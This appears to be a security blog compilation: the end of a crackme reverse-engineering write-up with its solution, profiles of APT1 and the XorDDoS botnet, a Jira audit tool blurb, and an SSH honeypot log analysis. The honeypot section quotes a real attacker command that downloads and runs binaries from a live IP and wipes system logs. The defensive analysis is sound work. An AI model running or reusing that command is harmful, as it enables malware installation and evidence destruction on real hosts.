? 0x1e790
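
The flag conditions from the table can be replayed in Python to see why a given jump is or is not taken. This is a simplified model I wrote for illustration: it handles 32-bit operands only, computes just ZF, SF and OF, and the names cmp_flags and taken are not part of any tool.

```python
MASK32 = 0xFFFFFFFF


def cmp_flags(a: int, b: int) -> dict:
    """Flags after `cmp a, b` on 32-bit operands (a - b, result discarded)."""
    a &= MASK32
    b &= MASK32
    result = (a - b) & MASK32
    return {
        "ZF": result == 0,
        "SF": bool(result >> 31),
        # Signed overflow: operands differ in sign and the result's sign
        # differs from the sign of the first operand.
        "OF": bool(((a ^ b) & (a ^ result)) >> 31),
    }


def taken(jump: str, flags: dict) -> bool:
    """Evaluate the jump conditions listed in the table."""
    conditions = {
        "je": flags["ZF"],
        "jne": not flags["ZF"],
        "jg": (not flags["ZF"]) and flags["SF"] == flags["OF"],
        "jl": flags["SF"] != flags["OF"],
    }
    return conditions[jump]


flags = cmp_flags(124816, 0x1E790)
print(flags, taken("jne", flags))
```

With the correct input the comparison sets ZF, so jne is not taken and execution falls through; any other input clears ZF and the jump is taken.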



0x00401497 jne 0x4014a5 is “jump if not equal”: it branches only when ZF == 0 (values unequal); if the input != 124816 execution jumps to 0x4014a5, skipping the subsequent print.

If EAX == 0x1E790 (ZF == 1), execution falls through to the next block: mov dword [esp], 0x40507e writes the address of the C string "You got it ;)" (located in .rdata at 0x40507e) into [esp] as the first function argument, a push-less argument setup (instead of push imm32).

call sym._printf invokes printf(const char *format); the call pushes the return address so that printf finds its first argument at [esp+4], consistent with the cdecl/varargs calling convention.

Finally, mov eax, 0 loads the immediate value 0 into EAX (overwriting any previous content); under the 32-bit cdecl ABI EAX is the standard return register, so this corresponds to return 0;. leave restores the stack frame (mov esp, ebp; pop ebp), and ret returns control to the caller.

Identifying and understanding these patterns is a key skill for writing pseudocode, so here is the complete result:


int main(char **argv) {
    printf("Enter password (int): ");
    int input;
    scanf("%d", &input);
    if (input == 124816) {
        printf("You got it ;)");
    }

    return 0;
}
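
For readers who are more comfortable with Python than C, the reconstructed check can be mirrored as follows. This is a loose sketch rather than a faithful port: check_password is my own name, and int() is stricter than scanf("%d"), which would also accept input with trailing characters.

```python
PASSWORD = 0x1E790  # the constant from `cmp eax, 0x1e790`


def check_password(user_input: str) -> bool:
    """Return True if the input parses to the integer the binary compares against."""
    try:
        value = int(user_input.strip())
    except ValueError:
        return False
    return value == PASSWORD


if check_password("124816"):
    print("You got it ;)")
```

Writing the constant in hex keeps the link to the disassembly visible, while the comparison itself works on the decimal value the user types.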

With this, we now have both the flag (124816) and the pseudocode for the challenge; I hope you were able to follow along and take something useful from my write-up. If you have feedback or questions, feel free to comment or contact me.

I also recommend reviewing all linked resources, as they can be very helpful if you want to dive deeper into reverse engineering 🙂

APT1

APT1 (Comment Crew / Shanghai Group) – Quick Facts

  • Type: Advanced Persistent Threat (APT)
  • Aliases: Comment Crew, Comment Group, Comment Panda, Unit 61398.
  • Origin: China, linked to PLA Unit 61398
  • Active Since: Mid-2000s
  • Primary Targets: Western corporations, government organizations, defense contractors
  • Motivation: Cyber espionage, intellectual property theft
  • Tactics & Techniques:
    • Spear-phishing emails
    • Custom malware and remote access tools (RATs)
    • Long-term network infiltration for intelligence gathering
  • Notable Campaigns:
    • Exfiltration of corporate data across multiple industries, including aerospace, energy, and technology
  • Significance:
    • One of the first publicly documented APT groups
    • Exposed in Mandiant’s 2013 report, raising global awareness of state-sponsored cyber espionage
  • Attributed Tools & Malware:
    • Malware Samples & More Malware Samples
    • WEBC2 Family:
      • WEBC2-AUSOV
      • WEBC2-ADSPACE
      • WEBC2-BOLID
      • WEBC2-CLOVER
      • WEBC2-CSON
      • WEBC2-DIV
      • WEBC2-GREENCAT
      • WEBC2-HEAD
      • WEBC2-KT3
      • WEBC2-QBP
      • WEBC2-RAVE
      • WEBC2-TABLE
      • WEBC2-TOCK
      • WEBC2-UGX
      • WEBC2-YAHOO
      • WEBC2-Y21K
    • GOGGLES – Downloader used by the group (serves as a payload/secondary-stage downloader).
    • GLASSES – A variant or close relative of GOGGLES; identified in a Citizen Lab analysis and likely an earlier or related implementation.
    • AURIGA / BANGAT – Tools linked to a developer tracked as “SuperHard”; mentioned by Mandiant but not always named in the public report.
    • Email-exfiltration utilities: GETMAIL (used to extract PST files) and MAPIGET (used to read emails that haven’t been archived).
    • Public privilege-escalation tools: examples include cachedump, fgdump, and gsecdump, not unique to APT1 but observed in their operations.
    • HTRAN (HUC Packet Transmit Tool) – used as a hop/proxy relay to forward communications between victims and command-and-control servers, helping to obscure origin and routing.
  • MITRE ATT&CK: https://attack.mitre.org/groups/G0006/

Description

APT1, often called the Comment Crew or PLA Unit 61398, is one of the most infamous and well-documented cyber espionage groups linked to the Chinese government. First brought into the spotlight by Mandiant’s 2013 report, APT1 was among the first hacking units publicly tied to a specific branch of China’s military, the People’s Liberation Army, revealing the true scale of state-backed digital espionage for economic and strategic gain.

Active since at least 2006, APT1 ran one of the most disciplined and long-running hacking operations ever uncovered. Its members focused on stealing intellectual property and confidential business information from hundreds of organizations across industries like aerospace, defense, energy, telecom, and manufacturing – mostly in the United States, but also in Europe and Asia. Everything they took seemed to serve China’s national interests, whether by boosting its industries or informing military and political strategies.

Technically, APT1 was known for its methodical and repeatable playbook. The group broke in through targeted phishing emails and custom malware such as the WEBC2 family (with variants like WEBC2-AUSOV and WEBC2-GREENCAT). Once inside, they dumped credentials with public tools such as fgdump, collected email with GETMAIL and MAPIGET, and routed stolen data through a vast command-and-control network of more than 1,000 servers and 2,500 domains, often relayed through HTRAN to hide their tracks. Their infrastructure and coding style were remarkably consistent, pointing to full-time engineers rather than lone hackers.

What made APT1 stand out wasn’t just the scale of its operations, but the professionalism behind it. Investigators found evidence of shift-based work hours, organized infrastructure, and shared codebases, all pointing to a state-run, military-grade espionage unit based in Shanghai. The exposure of APT1 changed how the world viewed cyber conflict, proving that digital espionage could be conducted with the same structure and intent as any traditional military campaign.

In many ways, APT1 set the template for the modern nation-state hacking group: large, organized, patient, and focused on long-term strategic advantage rather than chaos or quick profit. Its legacy still shapes how governments and companies think about cybersecurity and geopolitical risk today.

References:

JIRAudit

Your open-source tool for security audits in Jira Server & Data Center

With data protection and compliance a top priority today, it is essential to review the security and integrity of your Jira instance regularly. Jira ships with built-in audit logs, but these often lack the depth and flexibility that a comprehensive security analysis requires. This is where JIRAudit comes in: an open-source tool built specifically for Jira Server and Data Center.


What is JIRAudit?

JIRAudit is a Python-based security audit tool designed to identify security weaknesses in Jira instances. It provides a detailed analysis of user permissions, installed plugins, system configuration, and more. The tool helps administrators spot potential security risks and take appropriate action.


Key features at a glance

  • User and permission analysis: Reviews user accounts and their permissions to ensure that no unnecessary or excessive rights have been granted.
  • Plugin review: Identifies installed plugins and assesses their security status to reveal potential vulnerabilities.
  • System configuration analysis: Checks the Jira system configuration against best practices and for security gaps.
  • Reporting: Generates detailed reports that support administrators in fixing security issues.

Benefits of JIRAudit

  • Open source: JIRAudit is available under the Apache 2.0 license, which means it can be used, modified, and distributed free of charge.
  • Regular updates: The tool is updated continuously to keep pace with the latest Jira versions and security trends.
  • Easy integration: Because it is written in Python, JIRAudit fits easily into existing DevOps and CI/CD pipelines.

How to use JIRAudit

  1. Installation: Download the latest release from GitHub.
  2. Configuration: Adjust the settings.py file to match your Jira instance.
  3. Execution: Run the tool from the command line: python JIRAudit.py
  4. Analysis: Review the generated reports for potential security risks.

Further resources

XORDDoS


Malware Name / Type

  • Name: XorDDoS (aka XOR DDoS)
  • Type: Linux Trojan / DDoS botnet (rootkit-capable)

Quick Summary

  • First Seen / Known Since: First publicly reported in 2014 (discovered by MalwareMustDie).
  • Primary Targets / Industries: Linux servers, cloud instances, IoT devices, and container/Docker hosts.
  • Geographic Focus: Global; historically heavy activity in Asia and frequent targeting of US-based infrastructure in recent waves.

Infection & Distribution

  • Common Delivery Vectors: SSH brute-force / credential compromise, automated scanning of exposed services, malicious scripts dropped after initial access.
  • Initial Access Methods: Brute-force or stolen SSH credentials, exploitation of exposed management interfaces, automated deployment scripts.

Technical Characteristics

  • Platform / Language: Multi-architecture Linux ELF binaries (x86, x64, ARM); often accompanied by shell scripts for installation.
  • Persistence Mechanisms: Multi-stage installation that deploys rootkit components, cron jobs, and service wrappers, plus scripts that re-establish persistence across reboots.
  • Command & Control (C2): Encrypted communications often using simple XOR-based obfuscation; C2 infrastructure has evolved and includes resilient controller nodes and domain/IP patterns.
  • Capabilities: High-capacity volumetric DDoS (various UDP/TCP/HTTP flood techniques), remote command execution, bot management, and sometimes lateral scanning for new victims.
  • Evasion Techniques: XOR obfuscation of strings/traffic, rootkit hiding to conceal files/processes, multi-stage installers that complicate detection and attribution.
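
To illustrate the XOR-based obfuscation mentioned above, here is a minimal sketch of a repeating-key XOR routine. The key and the sample string are hypothetical placeholders chosen for illustration; they are not values taken from an XorDDoS sample.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with a repeating key.

    XOR is its own inverse, so the same call encodes and decodes.
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


if __name__ == "__main__":
    key = b"EXAMPLEKEY"  # hypothetical key, not from a real sample
    hidden = xor_bytes(b"/etc/cron.hourly/", key)  # hypothetical string
    print(hidden.hex())            # obfuscated form as it might sit in a binary
    print(xor_bytes(hidden, key))  # applying the key again restores the text
```

Because the operation is symmetric, an analyst who recovers the key from one sample can usually decode embedded strings and simple traffic with the same routine.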

Notable Campaigns / Incidents

  • Historic wave (2014–2015): Large brute-force campaigns that initially brought XorDDoS to light.
  • Resurgence / recent waves (2019–2025): Periodic resurgences with improved controllers and infrastructure; researchers documented a notable wave and new controller activity between late 2023 and early 2025.

Impact Assessment

  • Damage Potential: Medium to High. Primarily contributes to large-scale DDoS campaigns; infected hosts are turned into bots and can cause significant service disruption or be rented/sold for DDoS-for-hire.
  • Typical Victim Impact: Service downtime, increased bandwidth costs, potential secondary compromises if credentials are reused.

Indicators & Artifacts


Detection & Mitigation

  • Detection Tips: Monitor for high outbound DDoS traffic, sudden SSH login failures/successes (brute-force patterns), unexpected long-running ELF processes, hidden files/modules, and unusual cron/service entries.
  • Immediate Mitigation Steps: Isolate infected hosts from network, revoke SSH keys/passwords, rotate credentials, remove malicious persistence, patch exposed services, and restore from known-good images if rootkit compromise suspected.
  • Longer-term Recommendations: Harden SSH (disable password auth, use keys with MFA, rate-limit/geo-block where possible), apply least-privilege, enable host-based monitoring/EPP with rootkit detection, block known C2 domains/IPs at perimeter, and maintain IR playbooks for botnet infections.

WriteUp & Useful Resources

29.09.2025 – Honeypot Journal – SSH


Honeypot Details:

Type: SSH
Software used: Cowrie

Results

I publish partial results in my GitHub repository.
The repository includes passwords that were used in brute‑force attacks, as well as SSH keys that attackers used to maintain persistent access.

Tools Used: grep, jq, cut, cat, sort, uniq, file

29.09.25

In today’s journal entry I review the notable events and statistics collected by my Cowrie SSH honeypot on September 29, 2025.

The Cowrie instance runs on an isolated virtual machine to minimize risk and contain any interaction. I log all authentication attempts and record every command executed during attacker sessions. Command input and session metadata are retained for analysis, but any files that attackers attempt to create are not persisted to disk on this honeypot; the environment uses an emulated filesystem and does not store uploaded artifacts. This design choice reduces operational risk and simplifies recovery, but it also means I do not currently capture potential malware or dropped files.

Planned next steps: I will deploy a second, dedicated honeypot configured to capture and retain file artifacts and binaries for deeper forensic analysis. That secondary system will be isolated and instrumented to safely collect samples for static and dynamic inspection while preserving the containment and OPSEC posture of the current Cowrie deployment.

Cowrie stores all collected data in a cowrie.json log file. This file captures detailed information about authentication attempts, executed commands, session metadata, and other interactions with the honeypot.

Below are some example entries extracted from the JSON file generated by Cowrie:

{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"38749a7943fc","timestamp":"2025-09-29T20:58:40.655839Z","src_ip":"87.120.191.13","session":"51e74f48f036"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38722,"dst_ip":"172.26.0.2","dst_port":2222,"session":"50b8f390b79b","protocol":"ssh","message":"New connection: 87.120.191.13:38722 (172.26.0.2:2222) [session: 50b8f390b79b]","sensor":"38749a7943fc","timestamp":"2025-09-29T20:58:40.340065Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"38749a7943fc","timestamp":"2025-09-29T20:58:40.657900Z","src_ip":"87.120.191.13","session":"83f0f267918f"}

Each entry carries an eventid that classifies the logged action and a session field that ties it to a connection; together they allow us to track individual attacker actions throughout a session.

I have compiled a list of event IDs that Cowrie logs, providing an overview of the types of interactions and activities attackers perform on the honeypot.

Cowrie Event IDs

cowrie.client.fingerprint
SSH public key presented by the client; username, fingerprint, key, type

cowrie.login.success
successful authentication; username, password

cowrie.login.failed
failed authentication; username, password

cowrie.client.size
terminal size (SSH); width, height

cowrie.session.file_upload
uploaded file (e.g. via SFTP/SCP); filename, outfile, shasum

cowrie.command.input
shell commands entered by the attacker; input

cowrie.virustotal.scanfile
file submitted to VirusTotal; sha256, is_new, positives, total

cowrie.session.connect
new connection (session starts); src_ip, src_port, dst_ip, dst_port

cowrie.client.version
SSH identification string; version

cowrie.client.kex
SSH key exchange details; e.g. hassh, hasshAlgorithms, kexAlgs, keyAlgs

cowrie.session.closed
session ended; duration

cowrie.log.closed
TTY log (session log) closed; duration, ttylog (file name), size, shasum, duplicate

cowrie.direct-tcpip.request
proxying request (direct‑tcpip); dst_ip, dst_port, src_ip, src_port

cowrie.direct-tcpip.data
data that was to be forwarded via direct‑tcpip; dst_ip, dst_port

cowrie.client.var
variable client information; name, value
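
To get a feel for how these event IDs are distributed in a log, the entries can be counted per eventid. The following is a minimal sketch that assumes one JSON object per line, as in the example entries above; the function name count_event_ids and the shortened sample lines are my own illustration.

```python
import json
from collections import Counter
from typing import Iterable


def count_event_ids(lines: Iterable[str]) -> Counter:
    """Count log entries per eventid, skipping lines that are not JSON objects."""
    counts: Counter = Counter()
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line
        if isinstance(event, dict):
            counts[event.get("eventid", "unknown")] += 1
    return counts


if __name__ == "__main__":
    # Shortened variants of the example entries shown earlier.
    sample = [
        '{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13"}',
        '{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser"}',
        '{"eventid":"cowrie.login.success","username":"root","password":"password"}',
    ]
    for eventid, n in count_event_ids(sample).most_common():
        print(n, eventid)
```

For a real log, the same function could be fed an open file handle instead of the sample list.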

For an initial analysis I use grep to filter cowrie.json for specific eventid values. For today’s entry I will focus on the following areas:

  • Unique logins & geolocation: identify distinct successful authentications and map source IPs to countries
  • Notable executed commands: extract interesting or uncommon command sequences attackers ran
  • Longest sessions: find sessions with the greatest duration or highest command count
  • SSH keys: capture any public keys presented by clients or any key-related activity
  • Passwords: collect attempted passwords used during authentication attempts


Unique logins & geolocation

To extract all login attempts, I search for the following events: cowrie.login.success and cowrie.login.failed.
I use the following command to search for these two events:

grep "cowrie.login.*" cowrie.json.2025-09-29 | jq -r '.src_ip' | sort | uniq


To find out how many IP addresses attempted to connect:

grep "cowrie.login.*" cowrie.json.2025-09-29 | jq -r '.src_ip' | sort | uniq | wc -l
> 41
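
The same count can be reproduced without grep by parsing the JSON directly, which avoids matching the pattern in unrelated fields. This is a minimal sketch under the assumption that each log line is one JSON object; unique_login_ips is a hypothetical helper name.

```python
import json
from typing import Iterable, Set

LOGIN_EVENTS = {"cowrie.login.success", "cowrie.login.failed"}


def unique_login_ips(lines: Iterable[str]) -> Set[str]:
    """Return the distinct source IPs seen in login success/failure events."""
    ips: Set[str] = set()
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not valid JSON
        if not isinstance(event, dict):
            continue
        if event.get("eventid") in LOGIN_EVENTS and "src_ip" in event:
            ips.add(event["src_ip"])
    return ips


if __name__ == "__main__":
    # Shortened variants of the example entries shown earlier.
    sample = [
        '{"eventid":"cowrie.login.success","src_ip":"87.120.191.13"}',
        '{"eventid":"cowrie.login.failed","src_ip":"87.120.191.13"}',
        '{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62"}',
    ]
    ips = unique_login_ips(sample)
    print(len(ips), sorted(ips))
```

Only login events contribute to the set, so connections that never attempted authentication are not counted.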

I now want to perform geolocation to generate statistics about the countries of the IP addresses.

For quick queries, I use the GeoIP command-line tool geoiplookup. Unlike tools such as whois, it performs lookups offline against a local database, which makes bulk queries faster and simplifies geolocating many IPs.

To generate statistics, we can use standard Linux tools. Here is a one-liner that creates country statistics, assuming the unique IPs from the previous step have been saved to ips.txt:

while read -r line; do geoiplookup "$line" | cut -d' ' -f5- >> countries.tmp; done < ips.txt; sort < countries.tmp | uniq -c | sort -rn ; rm countries.tmp

The result:

China is the clear leader for today, followed by the United States, with Romania taking third place.
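
The counting step of the one-liner can also be sketched in Python. The example below assumes the legacy geoiplookup output format "GeoIP Country Edition: CC, Country Name"; the sample lines are illustrative and not taken from my logs, and both function names are hypothetical.

```python
from collections import Counter
from typing import Iterable

PREFIX = "GeoIP Country Edition: "  # assumed output prefix of geoiplookup


def country_from_geoiplookup(line: str) -> str:
    """Extract the country name from one geoiplookup output line."""
    line = line.strip()
    if not line.startswith(PREFIX):
        return "unknown"
    # The remainder looks like "CN, China"; lines without a country code
    # (for example "IP Address not found") map to "unknown".
    _code, sep, name = line[len(PREFIX):].partition(", ")
    return name if sep else "unknown"


def count_countries(lines: Iterable[str]) -> Counter:
    """Tally country names over many geoiplookup output lines."""
    return Counter(country_from_geoiplookup(line) for line in lines)


if __name__ == "__main__":
    # Illustrative output lines, not real results.
    sample = [
        "GeoIP Country Edition: CN, China",
        "GeoIP Country Edition: US, United States",
        "GeoIP Country Edition: CN, China",
        "GeoIP Country Edition: IP Address not found",
    ]
    for country, n in count_countries(sample).most_common():
        print(n, country)
```

Splitting on the first comma keeps country names that themselves contain commas intact, which the field-based cut approach also handles by taking everything from the fifth field onward.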


Notable executed commands

Since traffic on the honeypot remains modest, we can generate an overview of all distinct commands executed to identify potential candidates for deeper analysis:

grep "cowrie.command.input" cowrie.json | jq -r '.input' | sort | uniq

As we can see, quite a lot is happening here. Most of this activity comes from scanners that spend the entire day probing the Internet for open SSH ports and attempting to log in using password lists. Targets can include dedicated and cloud servers, IoT devices, industrial systems, and more.

Data collected from honeypots can be useful for several reasons:

  • IP Tracking: Attackers can be identified and reported.
  • Behavior Analysis: Record and analyze attacker behavior within the honeypot.
  • Malware Analysis: Track and store malware installed by attackers for further analysis.

Beyond the common background noise generated by these scanners, occasional attempts to install malware can be observed.

Here is what I found in today’s logs:

wdir="/bin"; for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"; do; if [ -w $i ]; then; wdir=$i; break; fi; done; cd $wdir; curl http://23.160.56.64/p.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; ./ygljglkjgfg0; wget http://23.160.56.64/p.txt -O ygljglkjgfg1; chmod +x ygljglkjgfg1; ./ygljglkjgfg1; good http://23.160.56.64/p.txt -O ygljglkjgfg2; chmod +x ygljglkjgfg2; ./ygljglkjgfg2; sleep 2; wget http://23.160.56.64/r.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13; ./sdf3fslsdf13; good http://23.160.56.64/r.txt -O sdf3fslsdf14; chmod +x sdf3fslsdf14; ./sdf3fslsdf14; curl http://23.160.56.64/r.txt -o sdf3fslsdf15; chmod +x sdf3fslsdf15; ./sdf3fslsdf15; sleep 2; mv /usr/bin/wget /usr/bin/good; mv /bin/wget /bin/good; cat /dev/null >/root/.bash_history; cat /dev/null > /var/log/wtmp; cat /dev/null > /var/log/btmp; cat /dev/null > /var/log/lastlog; cat /dev/null > /var/log/secure; cat /dev/null > /var/log/boot.log; cat /dev/null > /var/log/cron; cat /dev/null > /var/log/dmesg; cat /dev/null > /var/log/firewalld; cat /dev/null > /var/log/maillog; cat /dev/null > /var/log/messages; cat /dev/null > /var/log/spooler; cat /dev/null > /var/log/syslog; cat /dev/null > /var/log/tallylog; cat /dev/null > /var/log/yum.log; cat /dev/null >/root/.bash_history; ls -la /var/run/gcc.pid; exit $?

Security warning: Do not download the file unless you know what you’re doing!
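
To turn a captured command like the one above into indicators, the download URLs can be pulled out with a regular expression. This is a minimal sketch; extract_urls is a hypothetical helper and the sample string is a shortened excerpt of the logged command.

```python
import re
from typing import List

# Match http/https URLs up to whitespace, a semicolon, or a quote.
URL_RE = re.compile(r"https?://[^\s;\"']+")


def extract_urls(command: str) -> List[str]:
    """Return the distinct URLs in a command string, in order of appearance."""
    seen: List[str] = []
    for url in URL_RE.findall(command):
        if url not in seen:
            seen.append(url)
    return seen


if __name__ == "__main__":
    # Shortened excerpt of the command captured by the honeypot.
    command = (
        "curl http://23.160.56.64/p.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; "
        "wget http://23.160.56.64/r.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13"
    )
    for url in extract_urls(command):
        print(url)
```

The function only extracts strings and never fetches anything, so it is safe to run on untrusted log data.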

I downloaded p.txt and took a closer look at the file. A quick inspection reveals that it is not a text file but an ELF binary.

> file p.txt 
p.txt: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
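
The check that file performs here can be approximated by looking at the first bytes of the file: ELF binaries start with the magic bytes 0x7F 'E' 'L' 'F', and the fifth byte encodes the 32-bit or 64-bit class. The sketch below is a simplified illustration with hypothetical function names, not a replacement for file.

```python
ELF_MAGIC = b"\x7fELF"


def describe_elf_header(header: bytes) -> str:
    """Classify a file from its first bytes using the ELF identification fields."""
    if len(header) < 5 or header[:4] != ELF_MAGIC:
        return "not an ELF file"
    # Byte 4 (EI_CLASS): 1 means 32-bit objects, 2 means 64-bit objects.
    bits = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown class")
    return f"ELF {bits}"


def describe_file(path: str) -> str:
    """Read only the first 16 bytes of a file and classify them."""
    with open(path, "rb") as fh:
        return describe_elf_header(fh.read(16))


if __name__ == "__main__":
    # Synthetic headers for illustration; no sample is opened here.
    print(describe_elf_header(b"\x7fELF\x01\x01\x01" + b"\x00" * 9))
    print(describe_elf_header(b"#!/bin/sh\n"))
```

A misleading extension such as .txt has no effect on this check, since only the file content is inspected.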

To verify what type of malware this is, I uploaded the file to VirusTotal.

Now we know a bit more about the mysterious p.txt: it is the XorDDoS malware.

XorDDoS is a Linux-based malware that infects devices via weak SSH passwords or exposed services. It obfuscates its communication using XOR, turns infected systems into botnet nodes, and is primarily used to carry out DDoS attacks. Linux servers, IoT devices, and cloud systems are particularly targeted.

Read more about the XorDDoS malware here:

References

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos
https://unit42.paloaltonetworks.com/new-linux-xorddos-trojan-campaign-delivers-malware
https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices
https://blog.talosintelligence.com/unmasking-the-new-xorddos-controller-and-infrastructure
https://thehackernews.com/2025/04/experts-uncover-new-xorddos-controller.html
https://research.splunk.com/stories/xorddos/
https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/elf_xorddos.txt


Longest sessions

A beneficial side effect of operating a honeypot is the stolen time that scanners can never get back. Efficient botnet construction, when scanning the Internet for open ports, depends on speed. Smart scanners will ideally detect honeypots early and terminate the session once identified; any time an attacker spends on our honeypot is time they cannot use to infect other systems. With only a few honeypots this effect is marginal, but it scales: the more honeypots deployed across the Internet, the more attacker time is wasted.

I generate time-based statistics from the cowrie.session.closed event, since it includes session duration information.

In the log it looks like this:

{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"38749a7943fc","timestamp":"2025-09-29T23:57:44.723554Z","src_ip":"92.118.39.62","session":"33b169382dae"}

To generate concrete statistics from that, I use the following command:

cat cowrie.json.2025-09-29 | grep "cowrie.session.closed" | cut -d':' -f4 | cut -d' ' -f 4  | sort | uniq | sort -rn | head

The longest session therefore lasted 274 seconds, i.e. about 4 minutes 34 seconds (Cowrie reports the duration in seconds).

Now I want to calculate the total time all attackers spent on my system. For that I reuse my previous query and use awk to sum all durations.

cat cowrie.json.2025-09-29 | grep "cowrie.session.closed" | cut -d':' -f4 | cut -d' ' -f 4  | sort | uniq | sort -rn | awk '{for(i=1;i<=NF;i++) sum+=$i} END{print sum/60}'
> 30.6267

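Overall, attackers spent about 30.6 minutes on the system that day. Because sort | uniq collapses sessions with identical durations, this figure is a lower bound rather than an exact total. That may seem insignificant at first, but it adds up when extrapolated across hundreds or thousands of honeypots.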
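
The duration statistics can also be computed from the parsed JSON instead of cutting the message text. The sketch below assumes the duration field holds seconds as a string or number, as in the example entry; it sums every closed session without collapsing equal values, so its total can be higher than the shell result. session_durations is a hypothetical helper name.

```python
import json
from typing import Iterable, List


def session_durations(lines: Iterable[str]) -> List[float]:
    """Collect the duration (in seconds) of every cowrie.session.closed event."""
    durations: List[float] = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not valid JSON
        if not isinstance(event, dict):
            continue
        if event.get("eventid") != "cowrie.session.closed":
            continue
        try:
            durations.append(float(event["duration"]))
        except (KeyError, TypeError, ValueError):
            continue  # missing or malformed duration
    return durations


if __name__ == "__main__":
    # Shortened sample entries; the second and third are illustrative.
    sample = [
        '{"eventid":"cowrie.session.closed","duration":"1.2"}',
        '{"eventid":"cowrie.session.closed","duration":"1.2"}',
        '{"eventid":"cowrie.session.closed","duration":"60.0"}',
    ]
    d = session_durations(sample)
    print("longest (s):", max(d))
    print("total (min):", sum(d) / 60)
```

Keeping the durations as a list makes it easy to add further statistics later, such as a median or a per-IP breakdown.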


SSH keys

To gain persistent access, attackers often try to install SSH keys. These can provide valuable indicators to identify attackers early or attribute attacks to a particular actor. So far I have only found RSA public keys in the logs, so the command below filters for those; attackers can use other key algorithms, in which case the pattern needs to be adjusted. To extract the keys from the logs I use the following command:

cat cowrie.json | grep -o 'ssh-rsa A[A-Za-z0-9+/=]\+' | sort | uniq

If you want to scan for other SSH public keys, consider searching for ecdsa-sha2-*, ssh-ed25519, or ssh-dss as well.
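
A pattern covering several key types at once could look like the following sketch. It relies on the fact that the base64 blob of an OpenSSH public key starts with "AAAA"; the key strings in the example are shortened placeholders, not real keys, and find_public_keys is a hypothetical helper.

```python
import re
from typing import List

# Key type followed by the base64-encoded key blob.
KEY_RE = re.compile(
    r"(?:ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp(?:256|384|521))"
    r" AAAA[A-Za-z0-9+/]+={0,2}"
)


def find_public_keys(text: str) -> List[str]:
    """Return the sorted, de-duplicated public keys found in a block of text."""
    return sorted(set(KEY_RE.findall(text)))


if __name__ == "__main__":
    # Placeholder keys, truncated for readability.
    log_text = (
        'echo "ssh-rsa AAAAB3NzaC1yc2E= user" >> .ssh/authorized_keys\n'
        'echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5 x" >> .ssh/authorized_keys\n'
        'echo "ssh-rsa AAAAB3NzaC1yc2E= user" >> .ssh/authorized_keys\n'
    )
    for key in find_public_keys(log_text):
        print(key)
```

The comment field after the key is deliberately left out of the match, so the same key installed with different comments is only listed once.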

Note: In my GitHub repository you can find all logs and analyses I have collected.


Passwords

Another interesting aspect is generating a password list from the attackers’ login attempts. These password lists can be used to verify the strength of our own passwords, but also for other purposes such as detecting default credentials that may be embedded in applications. Such defaults are frequently abused to build botnets and remain a persistent problem, partly because some vendors do not take it seriously or, in some cases, include weak credentials intentionally.

To filter the passwords from today’s log I use the following command:

cat cowrie.json.2025-09-29 | grep "cowrie.login.*" | cut -d':' -f3,4 | cut -d '"' -f2,6 | grep -v '^"' | sed 's/"/:/' | sort | uniq

In total, I was able to identify 855 unique passwords for today.
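
Because the cut-based pipeline depends on the exact field order in each line, reading the username and password fields from the parsed JSON is a more robust alternative. The following is a minimal sketch; credential_counts is a hypothetical helper that also shows how often each pair was tried.

```python
import json
from collections import Counter
from typing import Iterable

LOGIN_EVENTS = {"cowrie.login.success", "cowrie.login.failed"}


def credential_counts(lines: Iterable[str]) -> Counter:
    """Count (username, password) pairs across all login events."""
    counts: Counter = Counter()
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not valid JSON
        if not isinstance(event, dict) or event.get("eventid") not in LOGIN_EVENTS:
            continue
        if "username" in event and "password" in event:
            counts[(event["username"], event["password"])] += 1
    return counts


if __name__ == "__main__":
    # Shortened variants of the example entries shown earlier.
    sample = [
        '{"eventid":"cowrie.login.success","username":"root","password":"password"}',
        '{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser"}',
        '{"eventid":"cowrie.login.success","username":"root","password":"password"}',
    ]
    counts = credential_counts(sample)
    passwords = sorted({password for _user, password in counts})
    print(len(passwords), "unique passwords")
    for (user, password), n in counts.most_common():
        print(n, f"{user}:{password}")
```

Passwords that contain colons or quotes are handled correctly here, since the JSON parser takes care of the escaping.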
